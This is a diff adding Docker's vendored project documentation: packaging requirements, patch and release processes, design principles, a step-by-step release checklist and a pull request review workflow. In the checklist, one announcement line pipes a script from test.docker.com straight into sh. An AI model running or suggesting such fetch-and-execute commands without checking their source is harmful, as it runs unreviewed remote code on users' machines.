+ +## System Dependencies + +### Runtime Dependencies + +To function properly, the Docker daemon needs the following software to be +installed and available at runtime: + +* iptables version 1.4 or later +* procps (or similar provider of a "ps" executable) +* e2fsprogs version 1.4.12 or later (in use: mkfs.ext4, tune2fs) +* xfsprogs (in use: mkfs.xfs) +* XZ Utils version 4.9 or later +* a [properly + mounted](https://github.com/tianon/cgroupfs-mount/blob/master/cgroupfs-mount) + cgroupfs hierarchy (having a single, all-encompassing "cgroup" mount point + [is](https://github.com/docker/docker/issues/2683) + [not](https://github.com/docker/docker/issues/3485) + [sufficient](https://github.com/docker/docker/issues/4568)) + +Additionally, the Docker client needs the following software to be installed and +available at runtime: + +* Git version 1.7 or later + +### Kernel Requirements + +The Docker daemon has very specific kernel requirements. Most pre-packaged +kernels already include the necessary options enabled. If you are building your +own kernel, you will either need to discover the options necessary via trial and +error, or check out the [Gentoo +ebuild](https://github.com/tianon/docker-overlay/blob/master/app-emulation/docker/docker-9999.ebuild), +in which a list is maintained (and if there are any issues or discrepancies in +that list, please contact Tianon so they can be rectified). + +Note that in client mode, there are no specific kernel requirements, and that +the client will even run on alternative platforms such as Mac OS X / Darwin. + +### Optional Dependencies + +Some of Docker's features are activated by using optional command-line flags or +by having support for them in the kernel or userspace. 
A few examples include: + +* AUFS graph driver (requires AUFS patches/support enabled in the kernel, and at + least the "auplink" utility from aufs-tools) +* BTRFS graph driver (requires BTRFS support enabled in the kernel) +* ZFS graph driver (requires userspace zfs-utils and a corresponding kernel module) +* Libseccomp to allow running seccomp profiles with containers + +## Daemon Init Script + +Docker expects to run as a daemon at machine startup. Your package will need to +include a script for your distro's process supervisor of choice. Be sure to +check out the "contrib/init" folder in case a suitable init script already +exists (and if one does not, contact Tianon about whether it might be +appropriate for your distro's init script to live there too!). + +In general, Docker should be run as root, similar to the following: + +```bash +docker daemon +``` + +Generally, a `DOCKER_OPTS` variable of some kind is available for adding more +flags (such as changing the graph driver to use BTRFS, switching the location of +"/var/lib/docker", etc). + +## Communicate + +As a final note, please do feel free to reach out to Tianon at any time for +pretty much anything. He really does love hearing from our packagers and wants +to make sure we're not being a "hostile upstream". As should be a given, we +appreciate the work our packagers do to make sure we have broad distribution! diff --git a/vendor/github.com/docker/docker/project/PATCH-RELEASES.md b/vendor/github.com/docker/docker/project/PATCH-RELEASES.md new file mode 100644 index 0000000000..548db9ab4d --- /dev/null +++ b/vendor/github.com/docker/docker/project/PATCH-RELEASES.md @@ -0,0 +1,68 @@ +# Docker patch (bugfix) release process + +Patch releases (the 'Z' in vX.Y.Z) are intended to fix major issues in a +release. 
Docker open source projects follow these procedures when creating a
+patch release:
+
+After each release (both "major" (vX.Y.0) and "patch" releases (vX.Y.Z)), a
+patch release milestone (vX.Y.Z + 1) is created.
+
+The creation of a patch release milestone is not an obligation to actually
+*create* a patch release. The purpose of these milestones is to collect
+issues and pull requests that can *justify* a patch release:
+
+- Any maintainer is allowed to add issues and PRs to the milestone; when
+  doing so, preferably leave a comment on the issue or PR explaining *why*
+  you think it should be considered for inclusion in a patch release.
+- Issues introduced in version vX.Y.0 get added to milestone X.Y.Z+1
+- Only *regressions* should be added. Issues *discovered* in version vX.Y.0,
+  but already present in version vX.Y-1.Z should not be added, unless
+  critical.
+- Patch releases can *only* contain bug-fixes. New features should
+  *never* be added to a patch release.
+
+The release captain of the "major" (X.Y.0) release is also responsible for
+patch releases. The release captain, together with another maintainer, will
+review issues and PRs on the milestone, and assigns `priority/` labels. These
+review sessions take place on a weekly basis, more frequently if needed:
+
+- A P0 priority is assigned to critical issues. A maintainer *must* be
+  assigned to these issues. Maintainers should strive to fix a P0 within a week.
+- A P1 priority is assigned to major, but not critical, issues. A maintainer
+  *must* be assigned to these issues.
+- P2 and P3 priorities are assigned to other issues. A maintainer can be
+  assigned.
+- Non-critical issues and PRs can be removed from the milestone. Minor
+  changes, such as typo fixes or omissions in the documentation, can be
+  considered for inclusion in a patch release.
+
+## Deciding if a patch release should be done
+
+- Only a P0 can justify proceeding with the patch release.
+- P1, P2, and P3 issues/PR's should not influence the decision, and + should be moved to the X.Y.Z+1 milestone, or removed from the + milestone. + +> **Note**: If the next "major" release is imminent, the release captain +> can decide to cancel a patch release, and include the patches in the +> upcoming major release. + +> **Note**: Security releases are also "patch releases", but follow +> a different procedure. Security releases are developed in a private +> repository, released and tested under embargo before they become +> publicly available. + +## Deciding on the content of a patch release + +When the criteria for moving forward with a patch release are met, the release +manager will decide on the exact content of the release. + +- Fixes to all P0 issues *must* be included in the release. +- Fixes to *some* P1, P2, and P3 issues *may* be included as part of the patch + release depending on the severity of the issue and the risk associated with + the patch. + +Any code delivered as part of a patch release should make life easier for a +significant amount of users with zero chance of degrading anybody's experience. +A good rule of thumb for that is to limit cherry-picking to small patches, which +fix well-understood issues, and which come with verifiable tests. diff --git a/vendor/github.com/docker/docker/project/PRINCIPLES.md b/vendor/github.com/docker/docker/project/PRINCIPLES.md new file mode 100644 index 0000000000..53f03018ec --- /dev/null +++ b/vendor/github.com/docker/docker/project/PRINCIPLES.md @@ -0,0 +1,19 @@ +# Docker principles + +In the design and development of Docker we try to follow these principles: + +(Work in progress) + +* Don't try to replace every tool. Instead, be an ingredient to improve them. +* Less code is better. +* Fewer components are better. Do you really need to add one more class? +* 50 lines of straightforward, readable code is better than 10 lines of magic that nobody can understand. +* Don't do later what you can do now. 
"//FIXME: refactor" is not acceptable in new code.
+* When hesitating between 2 options, choose the one that is easier to reverse.
+* No is temporary, Yes is forever. If you're not sure about a new feature, say no. You can change your mind later.
+* Containers must be portable to the greatest possible number of machines. Be suspicious of any change which makes machines less interchangeable.
+* The fewer moving parts in a container, the better.
+* Don't merge it unless you document it.
+* Don't document it unless you can keep it up-to-date.
+* Don't merge it unless you test it!
+* Everyone's problem is slightly different. Focus on the part that is the same for everyone, and solve that.
diff --git a/vendor/github.com/docker/docker/project/README.md b/vendor/github.com/docker/docker/project/README.md
new file mode 100644
index 0000000000..3ed68cf297
--- /dev/null
+++ b/vendor/github.com/docker/docker/project/README.md
@@ -0,0 +1,24 @@
+# Hacking on Docker
+
+The `project/` directory holds information and tools for everyone involved in the process of creating and
+distributing Docker, specifically:
+
+## Guides
+
+If you're a *contributor* or aspiring contributor, you should read [CONTRIBUTING.md](../CONTRIBUTING.md).
+
+If you're a *maintainer* or aspiring maintainer, you should read [MAINTAINERS](../MAINTAINERS).
+
+If you're a *packager* or aspiring packager, you should read [PACKAGERS.md](./PACKAGERS.md).
+
+If you're a maintainer in charge of a *release*, you should read [RELEASE-CHECKLIST.md](./RELEASE-CHECKLIST.md).
+
+## Roadmap
+
+A high-level roadmap is available at [ROADMAP.md](../ROADMAP.md).
+
+
+## Build tools
+
+[hack/make.sh](../hack/make.sh) is the primary build tool for docker. It is used for compiling the official binary,
+running the test suite, and pushing releases.
diff --git a/vendor/github.com/docker/docker/project/RELEASE-CHECKLIST.md b/vendor/github.com/docker/docker/project/RELEASE-CHECKLIST.md new file mode 100644 index 0000000000..84848cae2b --- /dev/null +++ b/vendor/github.com/docker/docker/project/RELEASE-CHECKLIST.md @@ -0,0 +1,518 @@ +# Release Checklist +## A maintainer's guide to releasing Docker + +So you're in charge of a Docker release? Cool. Here's what to do. + +If your experience deviates from this document, please document the changes +to keep it up-to-date. + +It is important to note that this document assumes that the git remote in your +repository that corresponds to "https://github.com/docker/docker" is named +"origin". If yours is not (for example, if you've chosen to name it "upstream" +or something similar instead), be sure to adjust the listed snippets for your +local environment accordingly. If you are not sure what your upstream remote is +named, use a command like `git remote -v` to find out. + +If you don't have an upstream remote, you can add one easily using something +like: + +```bash +export GITHUBUSER="YOUR_GITHUB_USER" +git remote add origin https://github.com/docker/docker.git +git remote add $GITHUBUSER git@github.com:$GITHUBUSER/docker.git +``` + +### 1. Pull from master and create a release branch + +All releases version numbers will be of the form: vX.Y.Z where X is the major +version number, Y is the minor version number and Z is the patch release version number. + +#### Major releases + +The release branch name is just vX.Y because it's going to be the basis for all .Z releases. + +```bash +export BASE=vX.Y +export VERSION=vX.Y.Z +git fetch origin +git checkout --track origin/master +git checkout -b release/$BASE +``` + +This new branch is going to be the base for the release. 
We need to push it to origin so we +can track the cherry-picked changes and the version bump: + +```bash +git push origin release/$BASE +``` + +When you have the major release branch in origin, we need to create the bump fork branch +that we'll push to our fork: + +```bash +git checkout -b bump_$VERSION +``` + +#### Patch releases + +If we have the release branch in origin, we can create the forked bump branch from it directly: + +```bash +export VERSION=vX.Y.Z +export PATCH=vX.Y.Z+1 +git fetch origin +git checkout --track origin/release/$BASE +git checkout -b bump_$PATCH +``` + +We cherry-pick only the commits we want into the bump branch: + +```bash +# get the commits ids we want to cherry-pick +git log +# cherry-pick the commits starting from the oldest one, without including merge commits +git cherry-pick -s -x +git cherry-pick -s -x +... +``` + +### 2. Update the VERSION files and API version on master + +We don't want to stop contributions to master just because we are releasing. +So, after the release branch is up, we bump the VERSION and API version to mark +the start of the "next" release. + +#### 2.1 Update the VERSION files + +Update the content of the `VERSION` file to be the next minor (incrementing Y) +and add the `-dev` suffix. For example, after the release branch for 1.5.0 is +created, the `VERSION` file gets updated to `1.6.0-dev` (as in "1.6.0 in the +making"). + +#### 2.2 Update API version on master + +We don't want API changes to go to the now frozen API version. Create a new +entry in `docs/reference/api/` by copying the latest and bumping the version +number (in both the file's name and content), and submit this in a PR against +master. + +### 3. 
Update CHANGELOG.md + +You can run this command for reference with git 2.0: + +```bash +git fetch --tags +LAST_VERSION=$(git tag -l --sort=-version:refname "v*" | grep -E 'v[0-9\.]+$' | head -1) +git log --stat $LAST_VERSION..bump_$VERSION +``` + +If you don't have git 2.0 but have a sort command that supports `-V`: +```bash +git fetch --tags +LAST_VERSION=$(git tag -l | grep -E 'v[0-9\.]+$' | sort -rV | head -1) +git log --stat $LAST_VERSION..bump_$VERSION +``` + +If releasing a major version (X or Y increased in vX.Y.Z), simply listing notable user-facing features is sufficient. +```markdown +#### Notable features since +* New docker command to do something useful +* Engine API change (deprecating old version) +* Performance improvements in some usecases +* ... +``` + +For minor releases (only Z increases in vX.Y.Z), provide a list of user-facing changes. +Each change should be listed under a category heading formatted as `#### CATEGORY`. + +`CATEGORY` should describe which part of the project is affected. + Valid categories are: + * Builder + * Documentation + * Hack + * Packaging + * Engine API + * Runtime + * Other (please use this category sparingly) + +Each change should be formatted as `BULLET DESCRIPTION`, given: + +* BULLET: either `-`, `+` or `*`, to indicate a bugfix, new feature or + upgrade, respectively. + +* DESCRIPTION: a concise description of the change that is relevant to the + end-user, using the present tense. Changes should be described in terms + of how they affect the user, for example "Add new feature X which allows Y", + "Fix bug which caused X", "Increase performance of Y". + +EXAMPLES: + +```markdown +## 0.3.6 (1995-12-25) + +#### Builder + ++ 'docker build -t FOO .' 
applies the tag FOO to the newly built image + +#### Engine API + +- Fix a bug in the optional unix socket transport + +#### Runtime + +* Improve detection of kernel version +``` + +If you need a list of contributors between the last major release and the +current bump branch, use something like: +```bash +git log --format='%aN <%aE>' v0.7.0...bump_v0.8.0 | sort -uf +``` +Obviously, you'll need to adjust version numbers as necessary. If you just need +a count, add a simple `| wc -l`. + +### 4. Change the contents of the VERSION file + +Before the big thing, you'll want to make successive release candidates and get +people to test. The release candidate number `N` should be part of the version: + +```bash +export RC_VERSION=${VERSION}-rcN +echo ${RC_VERSION#v} > VERSION +``` + +### 5. Test the docs + +Make sure that your tree includes documentation for any modified or +new features, syntax or semantic changes. + +To test locally: + +```bash +make docs +``` + +To make a shared test at https://beta-docs.docker.io: + +(You will need the `awsconfig` file added to the `docs/` dir) + +```bash +make AWS_S3_BUCKET=beta-docs.docker.io BUILD_ROOT=yes docs-release +``` + +### 6. Commit and create a pull request to the "release" branch + +```bash +git add VERSION CHANGELOG.md +git commit -m "Bump version to $VERSION" +git push $GITHUBUSER bump_$VERSION +echo "https://github.com/$GITHUBUSER/docker/compare/docker:release/$BASE...$GITHUBUSER:bump_$VERSION?expand=1" +``` + +That last command will give you the proper link to visit to ensure that you +open the PR against the "release" branch instead of accidentally against +"master" (like so many brave souls before you already have). + +### 7. Create a PR to update the AUTHORS file for the release + +Update the AUTHORS file, by running the `hack/generate-authors.sh` on the +release branch. To prevent duplicate entries, you may need to update the +`.mailmap` file accordingly. + +### 8. 
Build release candidate rpms and debs + +**NOTE**: It will be a lot faster if you pass a different graphdriver with +`DOCKER_GRAPHDRIVER` than `vfs`. + +```bash +docker build -t docker . +docker run \ + --rm -t --privileged \ + -e DOCKER_GRAPHDRIVER=aufs \ + -v $(pwd)/bundles:/go/src/github.com/docker/docker/bundles \ + docker \ + hack/make.sh binary build-deb build-rpm +``` + +### 9. Publish release candidate rpms and debs + +With the rpms and debs you built from the last step you can release them on the +same server, or ideally, move them to a dedicated release box via scp into +another docker/docker directory in bundles. This next step assumes you have +a checkout of the docker source code at the same commit you used to build, with +the artifacts from the last step in `bundles`. + +**NOTE:** If you put a space before the command your `.bash_history` will not +save it. (for the `GPG_PASSPHRASE`). + +```bash +docker build -t docker . +docker run --rm -it --privileged \ + -v /volumes/repos:/volumes/repos \ + -v $(pwd)/bundles:/go/src/github.com/docker/docker/bundles \ + -v $HOME/.gnupg:/root/.gnupg \ + -e DOCKER_RELEASE_DIR=/volumes/repos \ + -e GPG_PASSPHRASE \ + -e KEEPBUNDLE=1 \ + docker \ + hack/make.sh release-deb release-rpm sign-repos generate-index-listing +``` + +### 10. Upload the changed repos to wherever you host + +For example, above we bind mounted `/volumes/repos` as the storage for +`DOCKER_RELEASE_DIR`. In this case `/volumes/repos/apt` can be synced with +a specific s3 bucket for the apt repo and `/volumes/repos/yum` can be synced with +a s3 bucket for the yum repo. + +### 11. Publish release candidate binaries + +To run this you will need access to the release credentials. Get them from the +Core maintainers. + +```bash +docker build -t docker . 
+ +# static binaries are still pushed to s3 +docker run \ + -e AWS_S3_BUCKET=test.docker.com \ + -e AWS_ACCESS_KEY_ID \ + -e AWS_SECRET_ACCESS_KEY \ + -e AWS_DEFAULT_REGION \ + -i -t --privileged \ + docker \ + hack/release.sh +``` + +It will run the test suite, build the binaries and upload to the specified bucket, +so this is a good time to verify that you're running against **test**.docker.com. + +### 12. Purge the cache! + +After the binaries are uploaded to test.docker.com and the packages are on +apt.dockerproject.org and yum.dockerproject.org, make sure +they get tested in both Ubuntu and Debian for any obvious installation +issues or runtime issues. + +If everything looks good, it's time to create a git tag for this candidate: + +```bash +git tag -a $RC_VERSION -m $RC_VERSION bump_$VERSION +git push origin $RC_VERSION +``` + +Announcing on multiple medias is the best way to get some help testing! An easy +way to get some useful links for sharing: + +```bash +echo "Ubuntu/Debian: curl -sSL https://test.docker.com/ | sh" +echo "Linux 64bit binary: https://test.docker.com/builds/Linux/x86_64/docker-${VERSION#v}" +echo "Darwin/OSX 64bit client binary: https://test.docker.com/builds/Darwin/x86_64/docker-${VERSION#v}" +echo "Linux 64bit tgz: https://test.docker.com/builds/Linux/x86_64/docker-${VERSION#v}.tgz" +echo "Windows 64bit client binary: https://test.docker.com/builds/Windows/x86_64/docker-${VERSION#v}.exe" +echo "Windows 32bit client binary: https://test.docker.com/builds/Windows/i386/docker-${VERSION#v}.exe" +``` + +We recommend announcing the release candidate on: + +- IRC on #docker, #docker-dev, #docker-maintainers +- In a comment on the pull request to notify subscribed people on GitHub +- The [docker-dev](https://groups.google.com/forum/#!forum/docker-dev) group +- The [docker-maintainers](https://groups.google.com/a/dockerproject.org/forum/#!forum/maintainers) group +- Any social media that can bring some attention to the release candidate + +### 
13. Iterate on successive release candidates + +Spend several days along with the community explicitly investing time and +resources to try and break Docker in every possible way, documenting any +findings pertinent to the release. This time should be spent testing and +finding ways in which the release might have caused various features or upgrade +environments to have issues, not coding. During this time, the release is in +code freeze, and any additional code changes will be pushed out to the next +release. + +It should include various levels of breaking Docker, beyond just using Docker +by the book. + +Any issues found may still remain issues for this release, but they should be +documented and give appropriate warnings. + +During this phase, the `bump_$VERSION` branch will keep evolving as you will +produce new release candidates. The frequency of new candidates is up to the +release manager: use your best judgement taking into account the severity of +reported issues, testers availability, and time to scheduled release date. + +Each time you'll want to produce a new release candidate, you will start by +adding commits to the branch, usually by cherry-picking from master: + +```bash +git cherry-pick -s -x -m0 +``` + +You want your "bump commit" (the one that updates the CHANGELOG and VERSION +files) to remain on top, so you'll have to `git rebase -i` to bring it back up. + +Now that your bump commit is back on top, you will need to update the CHANGELOG +file (if appropriate for this particular release candidate), and update the +VERSION file to increment the RC number: + +```bash +export RC_VERSION=$VERSION-rcN +echo $RC_VERSION > VERSION +``` + +You can now amend your last commit and update the bump branch: + +```bash +git commit --amend +git push -f $GITHUBUSER bump_$VERSION +``` + +Repeat step 6 to tag the code, publish new binaries, announce availability, and +get help testing. + +### 14. 
Finalize the bump branch + +When you're happy with the quality of a release candidate, you can move on and +create the real thing. + +You will first have to amend the "bump commit" to drop the release candidate +suffix in the VERSION file: + +```bash +echo $VERSION > VERSION +git add VERSION +git commit --amend +``` + +You will then repeat step 6 to publish the binaries to test + +### 15. Get 2 other maintainers to validate the pull request + +### 16. Build final rpms and debs + +```bash +docker build -t docker . +docker run \ + --rm -t --privileged \ + -v $(pwd)/bundles:/go/src/github.com/docker/docker/bundles \ + docker \ + hack/make.sh binary build-deb build-rpm +``` + +### 17. Publish final rpms and debs + +With the rpms and debs you built from the last step you can release them on the +same server, or ideally, move them to a dedicated release box via scp into +another docker/docker directory in bundles. This next step assumes you have +a checkout of the docker source code at the same commit you used to build, with +the artifacts from the last step in `bundles`. + +**NOTE:** If you put a space before the command your `.bash_history` will not +save it. (for the `GPG_PASSPHRASE`). + +```bash +docker build -t docker . +docker run --rm -it --privileged \ + -v /volumes/repos:/volumes/repos \ + -v $(pwd)/bundles:/go/src/github.com/docker/docker/bundles \ + -v $HOME/.gnupg:/root/.gnupg \ + -e DOCKER_RELEASE_DIR=/volumes/repos \ + -e GPG_PASSPHRASE \ + -e KEEPBUNDLE=1 \ + docker \ + hack/make.sh release-deb release-rpm sign-repos generate-index-listing +``` + +### 18. Upload the changed repos to wherever you host + +For example, above we bind mounted `/volumes/repos` as the storage for +`DOCKER_RELEASE_DIR`. In this case `/volumes/repos/apt` can be synced with +a specific s3 bucket for the apt repo and `/volumes/repos/yum` can be synced with +a s3 bucket for the yum repo. + +### 19. 
Publish final binaries

+
+Once they're tested and reasonably believed to be working, run against
+get.docker.com:
+
+```bash
+docker build -t docker .
+# static binaries are still pushed to s3
+docker run \
+    -e AWS_S3_BUCKET=get.docker.com \
+    -e AWS_ACCESS_KEY_ID \
+    -e AWS_SECRET_ACCESS_KEY \
+    -e AWS_DEFAULT_REGION \
+    -i -t --privileged \
+    docker \
+    hack/release.sh
+```
+
+### 20. Purge the cache!
+
+### 21. Apply tag and create release
+
+It's very important that we don't make the tag until after the official
+release is uploaded to get.docker.com!
+
+```bash
+git tag -a $VERSION -m $VERSION bump_$VERSION
+git push origin $VERSION
+```
+
+Once the tag is pushed, go to GitHub and create a [new release](https://github.com/docker/docker/releases/new).
+If the tag is for an RC, make sure you check `This is a pre-release` at the bottom of the form.
+
+Select the tag that you just pushed as the version and paste the changelog in the description of the release.
+You can see examples in these two links:
+
+https://github.com/docker/docker/releases/tag/v1.8.0
+https://github.com/docker/docker/releases/tag/v1.8.0-rc3
+
+### 22. Go to GitHub to merge the `bump_$VERSION` branch into release
+
+Don't forget to push that pretty blue button to delete the leftover
+branch afterwards!
+
+### 23. Update the docs branch
+
+You will need to point the docs branch to the newly created release tag:
+
+```bash
+git checkout origin/docs
+git reset --hard origin/$VERSION
+git push -f origin docs
+```
+
+The docs will appear on https://docs.docker.com/ (though there may be cached
+versions, so it's worth checking http://docs.docker.com.s3-website-us-east-1.amazonaws.com/).
+For more information about documentation releases, see `docs/README.md`.
+
+Note that the new docs will not appear live on the site until the cache (a complex,
+distributed CDN system) is flushed. 
The `make docs-release` command will do this +_if_ the `DISTRIBUTION_ID` is set correctly - this will take at least 15 minutes to run +and you can check its progress with the CDN Cloudfront Chrome addon. + +### 24. Create a new pull request to merge your bump commit back into master + +```bash +git checkout master +git fetch +git reset --hard origin/master +git cherry-pick -s -x $VERSION +git push $GITHUBUSER merge_release_$VERSION +echo "https://github.com/$GITHUBUSER/docker/compare/docker:master...$GITHUBUSER:merge_release_$VERSION?expand=1" +``` + +Again, get two maintainers to validate, then merge, then push that pretty +blue button to delete your branch. + +### 25. Rejoice and Evangelize! + +Congratulations! You're done. + +Go forth and announce the glad tidings of the new release in `#docker`, +`#docker-dev`, on the [dev mailing list](https://groups.google.com/forum/#!forum/docker-dev), +the [announce mailing list](https://groups.google.com/forum/#!forum/docker-announce), +and on Twitter! diff --git a/vendor/github.com/docker/docker/project/RELEASE-PROCESS.md b/vendor/github.com/docker/docker/project/RELEASE-PROCESS.md new file mode 100644 index 0000000000..d764e9d007 --- /dev/null +++ b/vendor/github.com/docker/docker/project/RELEASE-PROCESS.md @@ -0,0 +1,78 @@ +# Docker Release Process + +This document describes how the Docker project is released. The Docker project +release process targets the Engine, Compose, Kitematic, Machine, Swarm, +Distribution, Notary and their underlying dependencies (libnetwork, libkv, +etc...). + +Step-by-step technical details of the process are described in +[RELEASE-CHECKLIST.md](https://github.com/docker/docker/blob/master/project/RELEASE-CHECKLIST.md). + +## Release cycle + +The Docker project follows a **time-based release cycle** and ships every nine +weeks. A release cycle starts the same day the previous release cycle ends. + +The first six weeks of the cycle are dedicated to development and review. 
During +this phase, new features and bugfixes submitted to any of the projects are +**eligible** to be shipped as part of the next release. No changeset submitted +during this period is however guaranteed to be merged for the current release +cycle. + +## The freeze period + +Six weeks after the beginning of the cycle, the codebase is officially frozen +and the codebase reaches a state close to the final release. A Release Candidate +(RC) gets created at the same time. The freeze period is used to find bugs and +get feedback on the state of the RC before the release. + +During this freeze period, while the `master` branch will continue its normal +development cycle, no new features are accepted into the RC. As bugs are fixed +in `master` the release owner will selectively 'cherry-pick' critical ones to +be included into the RC. As the RC changes, new ones are made available for the +community to test and review. + +This period lasts for three weeks. + +## How to maximize chances of being merged before the freeze date? + +First of all, there is never a guarantee that a specific changeset is going to +be merged. However there are different actions to follow to maximize the chances +for a changeset to be merged: + +- The team gives priority to review the PRs aligned with the Roadmap (usually +defined by a ROADMAP.md file at the root of the repository). +- The earlier a PR is opened, the more time the maintainers have to review. For +example, if a PR is opened the day before the freeze date, it’s very unlikely +that it will be merged for the release. +- Constant communication with the maintainers (mailing-list, IRC, Github issues, +etc.) allows to get early feedback on the design before getting into the +implementation, which usually reduces the time needed to discuss a changeset. 
+- If the code is commented, fully tested and by extension follows every single +rules defined by the [CONTRIBUTING guide]( +https://github.com/docker/docker/blob/master/CONTRIBUTING.md), this will help +the maintainers by speeding up the review. + +## The release + +At the end of the freeze (nine weeks after the start of the cycle), all the +projects are released together. + +``` + Codebase Release +Start of is frozen (end of the +the Cycle (7th week) 9th week) ++---------------------------------------+---------------------+ +| | | +| Development phase | Freeze phase | +| | | ++---------------------------------------+---------------------+ + 6 weeks 3 weeks +<---------------------------------------><--------------------> +``` + +## Exceptions + +If a critical issue is found at the end of the freeze period and more time is +needed to address it, the release will be pushed back. When a release gets +pushed back, the next release cycle gets delayed as well. diff --git a/vendor/github.com/docker/docker/project/REVIEWING.md b/vendor/github.com/docker/docker/project/REVIEWING.md new file mode 100644 index 0000000000..51ef4c59de --- /dev/null +++ b/vendor/github.com/docker/docker/project/REVIEWING.md @@ -0,0 +1,246 @@ +# Pull request reviewing process + +## Labels + +Labels are carefully picked to optimize for: + + - Readability: maintainers must immediately know the state of a PR + - Filtering simplicity: different labels represent many different aspects of + the reviewing work, and can even be targeted at different maintainers groups. + +A pull request should only be attributed labels documented in this section: other labels that may +exist on the repository should apply to issues. 
+ +### DCO labels + + * `dco/no`: automatically set by a bot when one of the commits lacks proper signature + +### Status labels + + * `status/0-triage` + * `status/1-design-review` + * `status/2-code-review` + * `status/3-docs-review` + * `status/4-ready-to-merge` + +Special status labels: + + * `status/failing-ci`: indicates that the PR in its current state fails the test suite + * `status/needs-attention`: calls for a collective discussion during a review session + +### Impact labels (apply to merged pull requests) + + * `impact/api` + * `impact/changelog` + * `impact/cli` + * `impact/deprecation` + * `impact/distribution` + * `impact/dockerfile` + +### Process labels (apply to merged pull requests) + +Process labels are to assist in preparing (patch) releases. These labels should only be used for pull requests. + +Label | Use for +------------------------------- | ------------------------------------------------------------------------- +`process/cherry-pick` | PRs that should be cherry-picked in the bump/release branch. These pull-requests must also be assigned to a milestone. +`process/cherry-picked` | PRs that have been cherry-picked. This label is helpful to find PR's that have been added to release-candidates, and to update the change log +`process/docs-cherry-pick` | PRs that should be cherry-picked in the docs branch. Only apply this label for changes that apply to the *current* release, and generic documentation fixes, such as Markdown and spelling fixes. +`process/docs-cherry-picked` | PRs that have been cherry-picked in the docs branch +`process/merge-to-master` | PRs that are opened directly on the bump/release branch, but also need to be merged back to "master" +`process/merged-to-master` | PRs that have been merged back to "master" + + +## Workflow + +An opened pull request can be in 1 of 5 distinct states, for each of which there is a corresponding +label that needs to be applied. 
+ +### Triage - `status/0-triage` + +Maintainers are expected to triage new incoming pull requests by removing the `status/0-triage` +label and adding the correct labels (e.g. `status/1-design-review`) before any other interaction +with the PR. The starting label may potentially skip some steps depending on the kind of pull +request: use your best judgement. + +Maintainers should perform an initial, high-level, overview of the pull request before moving it to +the next appropriate stage: + + - Has DCO + - Contains sufficient justification (e.g., usecases) for the proposed change + - References the Github issue it fixes (if any) in the commit or the first Github comment + +Possible transitions from this state: + + * Close: e.g., unresponsive contributor without DCO + * `status/1-design-review`: general case + * `status/2-code-review`: e.g. trivial bugfix + * `status/3-docs-review`: non-proposal documentation-only change + +### Design review - `status/1-design-review` + +Maintainers are expected to comment on the design of the pull request. Review of documentation is +expected only in the context of design validation, not for stylistic changes. + +Ideally, documentation should reflect the expected behavior of the code. No code review should +take place in this step. + +There are no strict rules on the way a design is validated: we usually aim for a consensus, +although a single maintainer approval is often sufficient for obviously reasonable changes. In +general, strong disagreement expressed by any of the maintainers should not be taken lightly. + +Once design is approved, a maintainer should make sure to remove this label and add the next one. 
+ +Possible transitions from this state: + + * Close: design rejected + * `status/2-code-review`: general case + * `status/3-docs-review`: proposals with only documentation changes + +### Code review - `status/2-code-review` + +Maintainers are expected to review the code and ensure that it is good quality and in accordance +with the documentation in the PR. + +New testcases are expected to be added. Ideally, those testcases should fail when the new code is +absent, and pass when present. The testcases should strive to test as many variants, code paths, as +possible to ensure maximum coverage. + +Changes to code must be reviewed and approved (LGTM'd) by a minimum of two code maintainers. When +the author of a PR is a maintainer, he still needs the approval of two other maintainers. + +Once code is approved according to the rules of the subsystem, a maintainer should make sure to +remove this label and add the next one. If documentation is absent but expected, maintainers should +ask for documentation and move to status `status/3-docs-review` for docs maintainer to follow. + +Possible transitions from this state: + + * Close + * `status/1-design-review`: new design concerns are raised + * `status/3-docs-review`: general case + * `status/4-ready-to-merge`: change not impacting documentation + +### Docs review - `status/3-docs-review` + +Maintainers are expected to review the documentation in its bigger context, ensuring consistency, +completeness, validity, and breadth of coverage across all existing and new documentation. + +They should ask for any editorial change that makes the documentation more consistent and easier to +understand. + +The docker/docker repository only contains _reference documentation_, all +"narrative" documentation is kept in a [unified documentation +repository](https://github.com/docker/docker.github.io). Reviewers must +therefore verify which parts of the documentation need to be updated. 
Any +contribution that may require changing the narrative should get the +`impact/documentation` label: this is the signal for documentation maintainers +that a change will likely need to happen on the unified documentation +repository. When in doubt, it’s better to add the label and leave it to +documentation maintainers to decide whether it’s ok to skip. In all cases, +leave a comment to explain what documentation changes you think might be needed. + +- If the pull request does not impact the documentation at all, the docs review + step is skipped, and the pull request is ready to merge. +- If the changes in + the pull request require changes to the reference documentation (either + command-line reference, or API reference), those changes must be included as + part of the pull request and will be reviewed now. Keep in mind that the + narrative documentation may contain output examples of commands, so may need + to be updated as well, in which case the `impact/documentation` label must + be applied. +- If the PR has the `impact/documentation` label, merging is delayed until a + documentation maintainer acknowledges that a corresponding documentation PR + (or issue) is opened on the documentation repository. Once a documentation + maintainer acknowledges the change, she/he will move the PR to `status/4-merge` + for a code maintainer to push the green button. + +Changes and additions to docs must be reviewed and approved (LGTM'd) by a minimum of two docs +sub-project maintainers. If the docs change originates with a docs maintainer, only one additional +LGTM is required (since we assume a docs maintainer approves of their own PR). + +Once documentation is approved, a maintainer should make sure to remove this label and +add the next one. 
+ +Possible transitions from this state: + + * Close + * `status/1-design-review`: new design concerns are raised + * `status/2-code-review`: requires more code changes + * `status/4-ready-to-merge`: general case + +### Merge - `status/4-ready-to-merge` + +Maintainers are expected to merge this pull request as soon as possible. They can ask for a rebase +or carry the pull request themselves. + +Possible transitions from this state: + + * Merge: general case + * Close: carry PR + +After merging a pull request, the maintainer should consider applying one or multiple impact labels +to ease future classification: + + * `impact/api` signifies the patch impacted the Engine API + * `impact/changelog` signifies the change is significant enough to make it in the changelog + * `impact/cli` signifies the patch impacted a CLI command + * `impact/dockerfile` signifies the patch impacted the Dockerfile syntax + * `impact/deprecation` signifies the patch participates in deprecating an existing feature + +### Close + +If a pull request is closed it is expected that sufficient justification will be provided. In +particular, if there are alternative ways of achieving the same net result then those needs to be +spelled out. If the pull request is trying to solve a use case that is not one that we (as a +community) want to support then a justification for why should be provided. + +The number of maintainers it takes to decide and close a PR is deliberately left unspecified. We +assume that the group of maintainers is bound by mutual trust and respect, and that opposition from +any single maintainer should be taken into consideration. Similarly, we expect maintainers to +justify their reasoning and to accept debating. 
